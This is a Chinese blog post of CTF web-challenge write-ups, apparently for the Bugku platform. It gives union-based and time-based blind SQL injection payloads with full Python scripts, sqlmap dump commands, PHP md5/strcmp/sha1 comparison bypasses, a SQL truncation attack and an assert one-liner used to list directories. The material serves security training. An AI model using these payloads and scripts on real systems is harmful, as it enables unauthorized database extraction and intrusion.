<h1 id="成绩单"><a href="#成绩单" class="headerlink" title="成绩单"></a>成绩单</h1><p>本题为sql注入题目。首先通过 1’ and ‘1’=’1’#和1’ and ‘1’=’2’#判断出是字符类型的注入。接着通过 1’ and length(‘xxxx’)=6#,发现题目没有过滤。然后就是正常的步骤了。通过order by发现需要4个空。<br>-1’ union select 1,database(),3,4# 爆出数据库名<br><img src="https://upload-images.jianshu.io/upload_images/11234137-57bba2f53084119d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-57bba2f53084119d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=’skctf_flag’ limit 0,1),3,4# 爆出库中全部表名<br><img src="https://upload-images.jianshu.io/upload_images/11234137-cd097f9e2378878e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-cd097f9e2378878e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>-1’ union select 1,(select group_concat(column_name) from information_schema.columns where table_name=’fl4g’ limit 0,1),3,4# 爆出表中全部列名<br><img src="https://upload-images.jianshu.io/upload_images/11234137-bfbb506a21181813.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-bfbb506a21181813.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>-1’ union select 1,(select group_concat(skctf_flag) from fl4g),3,4# 读取列中所有数据，得到flag，本题用sqlmap应该也能跑出<br><img src="https://upload-images.jianshu.io/upload_images/11234137-5155aeaf27506aeb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-5155aeaf27506aeb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>事实证明sqlmap跑出来了，具体操作步骤看下面的神奇的登陆框题目wp。<br><img src="https://upload-images.jianshu.io/upload_images/11234137-296d2707e7656ebc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-296d2707e7656ebc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="秋名山老司机"><a href="#秋名山老司机" class="headerlink" title="秋名山老司机"></a>秋名山老司机</h1><p>本题一看就是要用python写脚本<br><img src="https://upload-images.jianshu.io/upload_images/11234137-b86a6ed0c8f956ea.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-b86a6ed0c8f956ea.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>用python的requests库和re库编写脚本，然后提交结果，得到flag。<br><img src="https://upload-images.jianshu.io/upload_images/11234137-039a56cd52fbada2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-039a56cd52fbada2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>解题脚本：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python2</span><br><span class="line"># -*- coding: UTF-8 -*-</span><br><span class="line">import requests</span><br><span class="line">import re</span><br><span class="line">r=requests.session()</span><br><span class="line">url=&apos;http://123.206.87.240:8002/qiumingshan/&apos;</span><br><span class="line">s=r.get(url)</span><br><span class="line">print s.content.decode(&apos;utf-8&apos;)</span><br><span class="line">x=s.content.decode(&apos;utf-8&apos;)</span><br><span class="line">expression = re.search(r&apos;(\d+[+\-*])+(\d+)&apos;, x).group()</span><br><span class="line">xx=eval(expression)</span><br><span class="line">data=&#123;</span><br><span class="line">    &apos;value&apos;:xx</span><br><span class="line">&#125;</span><br><span class="line">p=r.post(url,data=data)</span><br><span class="line">print p.content</span><br></pre></td></tr></table></figure></p>
<h1 id="速度要快"><a href="#速度要快" class="headerlink" title="速度要快"></a>速度要快</h1><p>本题和上一题差不多，都是编写脚本的东西。<br><img src="https://upload-images.jianshu.io/upload_images/11234137-e83ac76e2c249ef2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-e83ac76e2c249ef2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<p>源代码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">import string</span><br><span class="line">import requests</span><br><span class="line">import base64</span><br><span class="line">r=requests.session()</span><br><span class="line">url=&apos;http://123.206.87.240:8002/web6/&apos;</span><br><span class="line">s=r.get(url)</span><br><span class="line">header=s.headers[&apos;flag&apos;]</span><br><span class="line">print header</span><br><span class="line">flag=base64.b64decode(header)</span><br><span class="line">print flag</span><br><span class="line">flag=(flag.split(&apos;:&apos;)[1])[1:]</span><br><span class="line">print flag</span><br><span class="line">flag=base64.b64decode(flag)</span><br><span class="line">print flag</span><br><span class="line">d=&#123;</span><br><span class="line">    &quot;margin&quot;:flag</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<h1 id="cookie欺骗"><a href="#cookie欺骗" class="headerlink" title="cookie欺骗"></a>cookie欺骗</h1><p>首先查看url，发现filename参数，说明可能可控。且finaname参数是base64加密的，line参数控制输出的行数，编写脚本输出index.php的内容。脚本如下：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python2</span><br><span class="line"># -*- coding: UTF-8 -*-</span><br><span class="line">import requests</span><br><span class="line">r=requests.session()</span><br><span class="line">url=&apos;http://123.206.87.240:8002/web11/index.php?line=&#123;0&#125;&amp;filename=aW5kZXgucGhw&apos;</span><br><span class="line">for i in range(100):</span><br><span class="line">    uurl=url.format(i)</span><br><span class="line">    s=r.get(uurl)</span><br><span class="line">    if s.content!=None:</span><br><span class="line">        print s.content</span><br></pre></td></tr></table></figure></p>
<p>index.php源码为：<br><img src="https://upload-images.jianshu.io/upload_images/11234137-2aac7937558a8b42.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-2aac7937558a8b42.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>根据源码，构造cookie，得到flag。<br><img src="https://upload-images.jianshu.io/upload_images/11234137-cf668c97ea017184.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-cf668c97ea017184.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="过狗一句话"><a href="#过狗一句话" class="headerlink" title="过狗一句话"></a>过狗一句话</h1><p>题目意思是用assert执行任意命令，则先用s=print_r(scandir(‘./‘));扫描目录<br><img src="https://upload-images.jianshu.io/upload_images/11234137-e83b4bfe89c481a5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-e83b4bfe89c481a5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>然后访问f14g.txt即可拿到flag<br><img src="https://upload-images.jianshu.io/upload_images/11234137-a1b27af7c47ef7df.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-a1b27af7c47ef7df.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="前女友"><a href="#前女友" class="headerlink" title="前女友"></a>前女友</h1><p>查看源码，发现code.txt，得到关键代码<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if(isset($_GET[&apos;v1&apos;]) &amp;&amp; isset($_GET[&apos;v2&apos;]) &amp;&amp; isset($_GET[&apos;v3&apos;]))&#123;</span><br><span class="line">    $v1 = $_GET[&apos;v1&apos;];</span><br><span class="line">    $v2 = $_GET[&apos;v2&apos;];</span><br><span class="line">    $v3 = $_GET[&apos;v3&apos;];</span><br><span class="line">    if($v1 != $v2 &amp;&amp; md5($v1) == md5($v2))&#123;</span><br><span class="line">        if(!strcmp($v3, $flag))&#123;</span><br><span class="line">            echo $flag;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>v1和v2用到的是md5弱比较，v3利用的是strcmp不能比较数组。构造payload：v1=QNKCDZO&amp;v2=s878926199a&amp;v3[]=1<br>得到flag<br><img src="https://upload-images.jianshu.io/upload_images/11234137-8a274064f70ee2fd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-8a274064f70ee2fd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="login1-SKCTF"><a href="#login1-SKCTF" class="headerlink" title="login1(SKCTF)"></a>login1(SKCTF)</h1><p>本题提示用sql约束攻击，即在注册的时候，没有用户名长度限制，注册一个超长的用户名，例如admin                                         1，然后密码输入个简单的，在注册完成后，实际数据库保存的用户名即为admin，而密码却为你自己设置的密码。<br><img src="https://upload-images.jianshu.io/upload_images/11234137-1ec5f7db92379690.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-1ec5f7db92379690.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="各种绕过"><a href="#各种绕过" class="headerlink" title="各种绕过"></a>各种绕过</h1><p>主要是利用了sha1函数对数组判断为null的绕过，payload如下：<br><img src="https://upload-images.jianshu.io/upload_images/11234137-1d972c6fc9fb99d3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-1d972c6fc9fb99d3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="web8"><a href="#web8" class="headerlink" title="web8"></a>web8</h1><p>题目源码为：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">extract($_GET);</span><br><span class="line">if (!empty($ac))</span><br><span class="line">&#123;</span><br><span class="line">$f = trim(file_get_contents($fn));</span><br><span class="line">if ($ac === $f)</span><br><span class="line">&#123;</span><br><span class="line">echo &quot;&lt;p&gt;This is flag:&quot; .&quot; $flag&lt;/p&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">echo &quot;&lt;p&gt;sorry!&lt;/p&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>即要从fn中读到f变量且f变量要和ac变量相等。构造payload<br><img src="https://upload-images.jianshu.io/upload_images/11234137-d70d821f70282b2f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-d70d821f70282b2f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="Insert-into注入"><a href="#Insert-into注入" class="headerlink" title="Insert into注入"></a>Insert into注入</h1><p>题目给了源码，我们通过改变Ip进行注入操作。改变IP的方法是X-Forwared-For来伪造IP。<br>通过burpsuite抓包测试，发现题目过滤了逗号，所以需要用到 select case when xxx then xxx else xxx end<br>首先通过sleep函数测试语句是否成功。<br><img src="https://upload-images.jianshu.io/upload_images/11234137-4316d5f3fb167d45.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-4316d5f3fb167d45.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>然后接下来就是编写python脚本了。<br>具体脚本如下。<br>爆库名长度：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">import time</span><br><span class="line">import string</span><br><span class="line">xxx=&apos;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_#*,&apos;</span><br><span class="line">r=requests.session()</span><br><span class="line">url=&apos;http://123.206.87.240:8002/web15/&apos;</span><br><span class="line">ppayload=&quot;127.0.0.1&apos;+(select case when length(database())=&#123;0&#125; then sleep(5) else 0 end))#&quot;</span><br><span class="line">database=&apos;&apos;</span><br><span class="line">for i in range(20):</span><br><span class="line">    pay=ppayload.format(i)</span><br><span class="line">    headers = &#123;</span><br><span class="line">        &apos;X-Forwarded-For&apos;: pay</span><br><span class="line">    &#125;</span><br><span class="line">    print headers</span><br><span class="line">    time1=time.time()</span><br><span class="line">    s=r.get(url,headers=headers)</span><br><span class="line">    time2=time.time()</span><br><span class="line">    if time2-time1&gt;5:</span><br><span class="line">        print i</span><br><span class="line">        break</span><br></pre></td></tr></table></figure></p>
<p><img src="https://upload-images.jianshu.io/upload_images/11234137-275197b799096777.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-275197b799096777.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>然后爆数据库名：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python2</span><br><span class="line"># -*- coding: UTF-8 -*-</span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">import string</span><br><span class="line">xxx=&apos;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_#*,&apos;</span><br><span class="line">r=requests.session()</span><br><span class="line">url=&apos;http://123.206.87.240:8002/web15/&apos;</span><br><span class="line">payload=&quot;127.0.0.1&apos;+(select case when substr(database() from &#123;0&#125; for 1)=&apos;&#123;1&#125;&apos; then sleep(3) else 0 end))#&quot;</span><br><span class="line">database=&apos;&apos;</span><br><span class="line">for i in range(20):</span><br><span class="line">    for j in xxx:</span><br><span class="line">        pay=payload.format(i,j)</span><br><span class="line">        print pay</span><br><span class="line">        time1 = time.time()</span><br><span class="line">        headers = &#123;</span><br><span class="line">            &apos;X-Forwarded-For&apos;: pay</span><br><span class="line">        &#125;</span><br><span class="line">        s = r.get(url, headers=headers)</span><br><span class="line">        time2 = time.time()</span><br><span class="line">        if time2-time1&gt;3:</span><br><span class="line">            database=database+j</span><br><span class="line">            print database</span><br><span class="line">            break</span><br></pre></td></tr></table></figure></p>
<p><img src="https://upload-images.jianshu.io/upload_images/11234137-4ad7dcf788571465.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-4ad7dcf788571465.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>接着爆表名：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python2</span><br><span class="line"># -*- coding: UTF-8 -*-</span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">import string</span><br><span class="line">xxx=&apos;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_#*,&apos;</span><br><span class="line">r=requests.session()</span><br><span class="line">url=&apos;http://123.206.87.240:8002/web15/&apos;</span><br><span class="line">payload=&quot;127.0.0.1&apos;and(case when substr(database() from &#123;0&#125; for 1)=&apos;&#123;1&#125;&apos; then sleep(3) else 0 end))#&quot;</span><br><span class="line">ppayload=&quot;127.0.0.1&apos;and(case when (substr((select group_concat(table_name) from information_schema.tables where table_schema=&apos;web15&apos; ) from &#123;0&#125; for 1)=&apos;&#123;1&#125;&apos;) then sleep(3) else 0 end))#&quot;</span><br><span class="line">database=&apos;&apos;</span><br><span class="line">for i in range(1,20):</span><br><span class="line">    for j in xxx:</span><br><span class="line">        pay=ppayload.format(i,j)</span><br><span class="line">        print pay</span><br><span class="line">        time1 = time.time()</span><br><span class="line">        headers = &#123;</span><br><span class="line">            &apos;X-Forwarded-For&apos;: pay</span><br><span class="line">        &#125;</span><br><span class="line">        s = r.get(url, headers=headers)</span><br><span class="line">        time2 = time.time()</span><br><span class="line">        if time2-time1&gt;3:</span><br><span class="line">            database=database+j</span><br><span class="line">            print database</span><br><span class="line">            break</span><br></pre></td></tr></table></figure></p>
<p><img src="https://upload-images.jianshu.io/upload_images/11234137-ac7fbf09adc2e5ec.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-ac7fbf09adc2e5ec.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>接着爆列名：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python2</span><br><span class="line"># -*- coding: UTF-8 -*-</span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">import string</span><br><span class="line">xxx=&apos;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_#*,&apos;</span><br><span class="line">r=requests.session()</span><br><span class="line">url=&apos;http://123.206.87.240:8002/web15/&apos;</span><br><span class="line">payload=&quot;127.0.0.1&apos;and(case when substr(database() from &#123;0&#125; for 1)=&apos;&#123;1&#125;&apos; then sleep(3) else 0 end))#&quot;</span><br><span class="line">ppayload=&quot;127.0.0.1&apos;and(case when (substr((select group_concat(column_name) from information_schema.columns where table_name=&apos;flag&apos; ) from &#123;0&#125; for 1)=&apos;&#123;1&#125;&apos;) then sleep(3) else 0 end))#&quot;</span><br><span class="line">database=&apos;&apos;</span><br><span class="line">for i in range(1,20):</span><br><span class="line">    for j in xxx:</span><br><span class="line">        pay=ppayload.format(i,j)</span><br><span class="line">        print pay</span><br><span class="line">        time1 = time.time()</span><br><span class="line">        headers = &#123;</span><br><span class="line">            &apos;X-Forwarded-For&apos;: pay</span><br><span class="line">        &#125;</span><br><span class="line">        s = r.get(url, headers=headers)</span><br><span class="line">        time2 = time.time()</span><br><span class="line">        if time2-time1&gt;3:</span><br><span class="line">            database=database+j</span><br><span class="line">            print database</span><br><span class="line">            break</span><br></pre></td></tr></table></figure></p>
<p><img src="https://upload-images.jianshu.io/upload_images/11234137-ba597882aafe5056.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-ba597882aafe5056.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>最后爆出flag内容<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python2</span><br><span class="line"># -*- coding: UTF-8 -*-</span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">import string</span><br><span class="line">xxx=&apos;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_#*,&apos;</span><br><span class="line">r=requests.session()</span><br><span class="line">url=&apos;http://123.206.87.240:8002/web15/&apos;</span><br><span class="line">payload=&quot;127.0.0.1&apos;and(case when substr(database() from &#123;0&#125; for 1)=&apos;&#123;1&#125;&apos; then sleep(3) else 0 end))#&quot;</span><br><span class="line">ppayload=&quot;127.0.0.1&apos;and(case when (substr((select flag from flag ) from &#123;0&#125; for 1)=&apos;&#123;1&#125;&apos;) then sleep(3) else 0 end))#&quot;</span><br><span class="line">database=&apos;&apos;</span><br><span class="line">for i in range(1,40):</span><br><span class="line">    for j in xxx:</span><br><span class="line">        pay=ppayload.format(i,j)</span><br><span class="line">        # print pay</span><br><span class="line">        time1 = time.time()</span><br><span class="line">        headers = &#123;</span><br><span class="line">            &apos;X-Forwarded-For&apos;: pay</span><br><span class="line">        &#125;</span><br><span class="line">        s = r.get(url, headers=headers)</span><br><span class="line">        time2 = time.time()</span><br><span class="line">        if time2-time1&gt;3:</span><br><span class="line">            database=database+j</span><br><span class="line">            print database</span><br><span class="line">            break</span><br></pre></td></tr></table></figure></p>
<p><img src="https://upload-images.jianshu.io/upload_images/11234137-e863736395d9a0bc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-e863736395d9a0bc.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="神奇的登陆框"><a href="#神奇的登陆框" class="headerlink" title="神奇的登陆框"></a>神奇的登陆框</h1><p>从<a href="https://blog.csdn.net/qq_38412357/article/details/79559039" target="_blank" rel="noopener">大佬的wp</a>上看到，这是一个运用sqlmap的好题目。<br>学会了一种新姿势，首先用burpsuite抓包，然后将包的内容保存到txt文本中。<br><img src="https://upload-images.jianshu.io/upload_images/11234137-51abac3a99e17ec7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-51abac3a99e17ec7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"><br>然后就是注入工作<br>爆库：(python sqlmap.py -r “1.txt” -p admin_name –dbs)<br>爆表：(python sqlmap.py -r “C:\Users\56366\Desktop\1.txt” -D bugkusql1 -p admin_name –tables)<br>爆列：(python sqlmap.py -r “C:\Users\56366\Desktop\1.txt” -D bugkusql1 -T flag1 -p admin_name –columns)<br>爆数据：(python sqlmap.py -r “C:\Users\56366\Desktop\1.txt” -D bugkusql1 -T flag1 -C flag1 -p admin_name –dump)<br><img src="https://upload-images.jianshu.io/upload_images/11234137-4b42deaa531ed4a7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-4b42deaa531ed4a7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>
<h1 id="PHP-encrypt-1-ISCCCTF"><a href="#PHP-encrypt-1-ISCCCTF" class="headerlink" title="PHP_encrypt_1(ISCCCTF)"></a>PHP_encrypt_1(ISCCCTF)</h1><p>首先下载文件，查看题目给的index.php<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">function encrypt($data,$key)</span><br><span class="line">&#123;</span><br><span class="line">    $key = md5(&apos;ISCC&apos;);</span><br><span class="line">    $x = 0;</span><br><span class="line">    $len = strlen($data);</span><br><span class="line">    $klen = strlen($key);</span><br><span class="line">    for ($i=0; $i &lt; $len; $i++) &#123; </span><br><span class="line">        if ($x == $klen)</span><br><span class="line">        &#123;</span><br><span class="line">            $x = 0;</span><br><span class="line">        &#125;</span><br><span class="line">        $char .= $key[$x];</span><br><span class="line">        $x+=1;</span><br><span class="line">    &#125;</span><br><span class="line">    for ($i=0; $i &lt; $len; $i++) &#123;</span><br><span class="line">        $str .= chr((ord($data[$i]) + ord($char[$i])) % 128);</span><br><span class="line">    &#125;</span><br><span class="line">    return base64_encode($str);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure></p>
<p>然后按照他的反过程运算一下就得到了，python代码如下<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">#!/usr/bin/env python2</span><br><span class="line">import re</span><br><span class="line">import requests</span><br><span class="line">import time</span><br><span class="line">import base64</span><br><span class="line">import md5</span><br><span class="line">str=base64.b64decode(&quot;fR4aHWwuFCYYVydFRxMqHhhCKBseH1dbFygrRxIWJ1UYFhotFjA=&quot;)</span><br><span class="line">print len(str)</span><br><span class="line">key=&quot;729623334f0aa2784a1599fd374c120d729623&quot;</span><br><span class="line">print len(key)</span><br><span class="line">data=&apos;&apos;</span><br><span class="line">for i in range(38):</span><br><span class="line">    if ord(str[i])&gt;ord(key[i]):</span><br><span class="line">        data=data+chr(ord(str[i])-ord(key[i]))</span><br><span class="line">    if ord(str[i]) &lt;= ord(key[i]):</span><br><span class="line">        data = data + chr(ord(str[i])-ord(key[i])+128)</span><br><span class="line">print data</span><br></pre></td></tr></table></figure></p>
<p><img src="https://upload-images.jianshu.io/upload_images/11234137-aa0a030bcc70b673.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt="https://upload-images.jianshu.io/upload_images/11234137-aa0a030bcc70b673.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240"></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"># CTF</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2018/10/16/ustc/" rel="next" title="2018ustcCTF部分题目wp">
                <i class="fa fa-chevron-left"></i> 2018ustcCTF部分题目wp
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2018/10/24/phpxuliehua/" rel="prev" title="PHP反序列化的一些例子">
                PHP反序列化的一些例子 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
